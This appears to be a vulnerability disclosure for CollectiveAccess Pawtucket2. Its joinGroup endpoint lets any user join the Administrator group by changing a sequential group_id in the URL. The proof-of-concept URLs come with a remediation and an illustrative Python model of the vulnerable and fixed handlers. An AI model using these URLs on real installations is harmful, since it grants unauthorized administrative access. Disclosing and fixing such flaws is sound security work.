Improper Access Control in collectiveaccess/pawtucket2
Sep 30th 2021
An attacker can join any user group in the Pawtucket2 interface: the LoginReg/joinGroup action takes the target group from the group_id value in the URL and does not check whether the requester is allowed to join that group. Because the ids are small sequential integers rather than randomised, every group can be found by counting upwards.
Proof of Concept
Any attacker can join the Administrator group using:

http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/2

An attacker can join any other group by incrementing the number by 1:

http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/1
http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/3
http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/4
This vulnerability allows attackers to join the Administrator group, and any other group, without being invited, bypassing the application's access controls.
Check on the server side, before adding the user, that the requested group permits self-enrolment or that the requester holds an invitation for it. Randomised group ids would only slow down enumeration; an attacker who learns the Administrator group's id would still be able to join it, so they do not replace that authorization check.
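The following Python model illustrates both the proof of concept and the fix. It is an added example and not CollectiveAccess or Pawtucket2 code: the in-memory group table, the group names other than Administrator, the `open_enrollment` flag and the handler names are assumptions made for this example. It walks group_id 1..4 the way the PoC URLs do, shows that a handler without an authorization check lets the caller into every group, that a handler which checks self-enrolment only admits the caller to groups flagged as open, and that merely randomising the ids does not protect a group whose id has leaked.

```python
"""Model of the Pawtucket2 joinGroup flaw and of a proper fix.

Added illustration, not CollectiveAccess code. The group table, the
open_enrollment flag and the handler names are assumptions; group ids
1..4 and the Administrator group at id 2 mirror the PoC URLs above.
"""
from dataclasses import dataclass, field
import secrets


@dataclass
class Group:
    group_id: object            # int in the real app; str after randomisation
    name: str
    open_enrollment: bool       # may any logged-in user self-join? (assumed flag)
    members: set = field(default_factory=set)


def make_groups():
    """Constructed sample data: fresh copy per call so tests do not share state."""
    return {
        1: Group(1, "Public", open_enrollment=True),
        2: Group(2, "Administrator", open_enrollment=False),
        3: Group(3, "Curators", open_enrollment=False),
        4: Group(4, "Volunteers", open_enrollment=True),
    }


def join_group_vulnerable(user, groups, group_id):
    """Mirrors the reported behaviour: whatever id the URL carries is honoured."""
    group = groups.get(group_id)
    if group is None:
        return False
    group.members.add(user)
    return True


def join_group_fixed(user, groups, group_id):
    """Server-side authorization: only self-enrolment groups may be joined here.
    Closed groups (Administrator, Curators) must be entered via an invitation
    flow that this endpoint does not provide, so the request is refused."""
    group = groups.get(group_id)
    if group is None or not group.open_enrollment:
        return False
    group.members.add(user)
    return True


def enumerate_joins(handler, user, groups, id_range):
    """The PoC technique: try group_id 1, 2, 3, ... and record which succeed."""
    return [gid for gid in id_range if handler(user, groups, gid)]


def randomize_ids(groups):
    """Re-key the table with unguessable ids (the report's suggested fix).
    Returns the new table and the Administrator group's new id, standing in
    for an id that leaked through a log, a referrer or a page source."""
    new_groups = {}
    admin_id = None
    for group in groups.values():
        rid = secrets.token_hex(16)
        group.group_id = rid
        new_groups[rid] = group
        if group.name == "Administrator":
            admin_id = rid
    return new_groups, admin_id


if __name__ == "__main__":
    attacker = "attacker"
    print("vulnerable:", enumerate_joins(join_group_vulnerable, attacker, make_groups(), range(1, 5)))
    print("fixed:     ", enumerate_joins(join_group_fixed, attacker, make_groups(), range(1, 5)))
    rg, leaked_admin_id = randomize_ids(make_groups())
    print("random ids, enumeration:", enumerate_joins(join_group_vulnerable, attacker, rg, range(1, 5)))
    print("random ids, leaked admin id, no check:", join_group_vulnerable(attacker, rg, leaked_admin_id))
    print("random ids, leaked admin id, with check:", join_group_fixed(attacker, rg, leaked_admin_id))
```

Run as a script it prints which ids each handler admits the attacker to. The point of the last two lines is the caveat above: with random ids the sequential scan finds nothing, but the vulnerable handler still admits the attacker to the Administrator group the moment its id is known, while the fixed handler refuses regardless of how the id was obtained.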